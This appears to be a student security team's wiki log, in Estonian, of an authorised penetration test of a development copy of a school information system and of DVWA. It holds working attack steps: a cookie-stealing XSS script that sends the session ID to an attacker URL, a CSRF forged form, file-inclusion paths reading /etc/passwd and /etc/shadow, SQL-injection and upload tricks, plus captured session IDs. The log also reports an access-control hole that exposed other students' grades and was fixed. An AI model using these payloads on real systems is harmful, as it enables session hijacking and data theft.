[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]&lt;br /&gt;
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]&lt;br /&gt;
Võimalik kätte saada SSL Certificate.&lt;br /&gt;
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:&lt;br /&gt;
  https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?&lt;br /&gt;
  username=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&amp;amp;continue=&amp;amp;Login=Logi sisse&amp;amp;pw=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
Programmi sisestatud andmetega ka mitte:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Basic HTTP Authentication:&lt;br /&gt;
    basicAuthUser: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthPass: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthDomain: http://itcollege.dev.ois.ee&lt;br /&gt;
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Cookies&lt;br /&gt;
    cookieJarFile: /root/Desktop/&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;ois_cookie.txt&amp;lt;/font&amp;gt;&lt;br /&gt;
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:&lt;br /&gt;
  # Netscape HTTP Cookie File&lt;br /&gt;
  .dev.ois.ee	TRUE	/	FALSE	1731510001	itcollege_OIS_SESSION_ID	&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;870aqllryuw3cmf6cv8ellha03&amp;lt;/font&amp;gt;&lt;br /&gt;
Esimene rida on nõutav! Teiste tähendused:&lt;br /&gt;
  domain - The domain that created and that can read the variable.&lt;br /&gt;
  flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.&lt;br /&gt;
    This value is set automatically by the browser, depending on the value you set for domain.&lt;br /&gt;
  path - The path within the domain that the variable is valid for.&lt;br /&gt;
  secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.&lt;br /&gt;
  expiration - The UNIX time that the variable will expire on.&lt;br /&gt;
  name - The name of the variable.&lt;br /&gt;
  value - The value of the variable.&lt;br /&gt;
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:&lt;br /&gt;
  Edit -&amp;gt; Preferences -&amp;gt; Privacy -&amp;gt; History -&amp;gt; remove individual cookies&lt;br /&gt;
    Search: itcollege.dev.ois.ee&lt;br /&gt;
    Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Skänneerimine:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The page language is: en&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; has a &amp;quot;&amp;lt;form&amp;gt;&amp;quot; element with auto-complete enabled.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;A comment with the string &amp;quot;&amp;lt;p&amp;amp;gt;tunne end kui koolis&amp;lt;/p&amp;amp;gt;&amp;quot; was found in: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Found a form login. The action of the form is: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  The username field to be used is: &amp;quot;username&amp;quot;.&lt;br /&gt;
  The password field to be used is: &amp;quot;pw&amp;quot;.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;Found authentication credentials to: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;. A correct user and password combination is: Administrador/6666666&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  Antud kasutaja ja parooliga sisse ei saanud.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; returned a response that may contain a &amp;quot;SHA1&amp;quot; hash. The hash is: &amp;quot;c7b39896de5f296b5a44c2dfcd9f0600b2cf424d&amp;quot;. This is uncommon and requires human verification.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; sent these cookies:&amp;lt;/li&amp;gt;&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/&lt;br /&gt;
&amp;lt;li&amp;gt;The SMTP settings in emailReport plugin seem to be incorrect. Original error: &amp;quot;[Errno 111] Connection refused&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Kui tuleb see veateade, siis skänn katkeb.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;SQL injection in a Unknown database was found at: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;, using HTTP method POST.&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The sent post-data was: &amp;quot;username=John8212&amp;amp;security_key_sis_global=d&#039;z&amp;quot;0&amp;amp;Login=Logi%20sisse&amp;amp;continue=56&amp;amp;pw=FrAmE30.&amp;quot;.&lt;br /&gt;
    The modified parameter was &amp;quot;security_key_sis_global&amp;quot;. This vulnerability was found in the request with id 390.&lt;br /&gt;
&amp;lt;li&amp;gt;Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt&amp;lt;/li&amp;gt;&lt;br /&gt;
  User-agent: *&lt;br /&gt;
  Disallow: /&lt;br /&gt;
  Allow: /curriculum&lt;br /&gt;
  Allow: /subject&lt;br /&gt;
  Allow: /diploma&lt;br /&gt;
  Allow: /schedule/ical&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 4. päev - Presentatsiooni tegemine ja esitlemine ==&lt;br /&gt;
&lt;br /&gt;
Koostasime presentatsiooni ja esitlemine.&lt;br /&gt;
&lt;br /&gt;
[[Media:Security_team_presentation.ppt]]&lt;br /&gt;
&lt;br /&gt;
== Arvamused intensiivõppe nädala kohta ==&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno A21&lt;br /&gt;
&lt;br /&gt;
Urmo Lihten A21&lt;br /&gt;
&lt;br /&gt;
Taavi Podžuks A22&lt;br /&gt;
&lt;br /&gt;
Matis Alliksoo A22&lt;br /&gt;
&lt;br /&gt;
Sander Saarm A22&lt;br /&gt;
&lt;br /&gt;
== Juhendajad ==&lt;br /&gt;
Mart Mangus&lt;br /&gt;
&lt;br /&gt;
Margus Ernits&lt;br /&gt;
&lt;br /&gt;
Valter Kungla&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47030</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47030"/>
		<updated>2012-03-30T11:32:12Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* Väike upload tegevus, mis võiks olla teisiti */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidega tutvumine ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;POOLELI!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
Sanderi konspekt: [[Media:Ois_materjal.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A9.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A5.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
===Security Team tegevusplaan===&lt;br /&gt;
1.	Päev&lt;br /&gt;
 1.1	Tutvuda OWASP’iga. &lt;br /&gt;
 1.2	Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.&lt;br /&gt;
 1.3	Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.&lt;br /&gt;
2.	Päev&lt;br /&gt;
 2.1	Esitada tiimi tegevusplaan.&lt;br /&gt;
 2.2	Tutvuda turvariskidega natuke põhjalikumalt.&lt;br /&gt;
 2.3	Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.&lt;br /&gt;
 2.4	Täiendada esimese päeva ettekannet.&lt;br /&gt;
3.	Päev&lt;br /&gt;
 3.1	Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.&lt;br /&gt;
 3.2	Saadud tulemuste dokumenteerimine.&lt;br /&gt;
4.	Päev&lt;br /&gt;
 4.1	Saadud tulemuste esitlemine ettekandega&lt;br /&gt;
5.	Päev&lt;br /&gt;
 5.1	Tulemuste parandamine wiki’s.&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
http://www.acunetix.com/support/vulnerability-checks.htm&lt;br /&gt;
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting&lt;br /&gt;
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;br /&gt;
http://www.youtube.com/watch?v=SG1cvGQ971g&lt;br /&gt;
http://www.isecom.org/research.html&lt;br /&gt;
http://evuln.com/tools/&lt;br /&gt;
http://sectools.org/tag/web-scanners/&lt;br /&gt;
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/getting-started.htm&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:&lt;br /&gt;
Acunetix Web Vulnerability Scanner v. 8&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/&lt;br /&gt;
&lt;br /&gt;
Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.&lt;br /&gt;
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.&lt;br /&gt;
Antud programm võimaldab skännida:&lt;br /&gt;
Cross-Site Scripting (XSS)&lt;br /&gt;
SQL Injection (blind test)&lt;br /&gt;
File inclusion&lt;br /&gt;
Code Execution&lt;br /&gt;
LDAP Injection&lt;br /&gt;
Cross Frame Scripting&lt;br /&gt;
SQL Injection (error msg. test)&lt;br /&gt;
CRLF Injection&lt;br /&gt;
Directory Travelsal&lt;br /&gt;
XPath Injection&lt;br /&gt;
URL Redirection&lt;br /&gt;
Application Error Message&lt;br /&gt;
&lt;br /&gt;
Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
===== Fireforce plugin Firefoxis =====&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce. &lt;br /&gt;
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .&lt;br /&gt;
&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud. &lt;br /&gt;
Selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse. &lt;br /&gt;
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada. &lt;br /&gt;
Päringute tegemise kiirus vähem kui 1 päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
Kasutasime ka videos näidatud &amp;quot;@ DICTIONARY&amp;quot; teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
===== Burpsuite v1.4 =====&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI&#039;st]]&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
[[Image:Xsstesting.jpg|Location=&amp;quot;left&amp;quot;|Caption|]]&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
    &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
  esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
  teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
    &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida ei saa näiteks järgnevates formaatides faile:&amp;lt;/li&amp;gt;&lt;br /&gt;
  .htaccess&lt;br /&gt;
  .php	.html	.pdf&lt;br /&gt;
  .gif	.png	.bmp&lt;br /&gt;
  .svg	.swf&lt;br /&gt;
  .tif	.tiff	.exif&lt;br /&gt;
  .raw	.cgm&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
  Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
  ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
  data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]&lt;br /&gt;
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.&amp;lt;br&amp;gt;&lt;br /&gt;
Faile saab alla laadida enda profiili all õppesooritustes.&amp;lt;br&amp;gt;&lt;br /&gt;
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.&amp;lt;br&amp;gt;&lt;br /&gt;
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
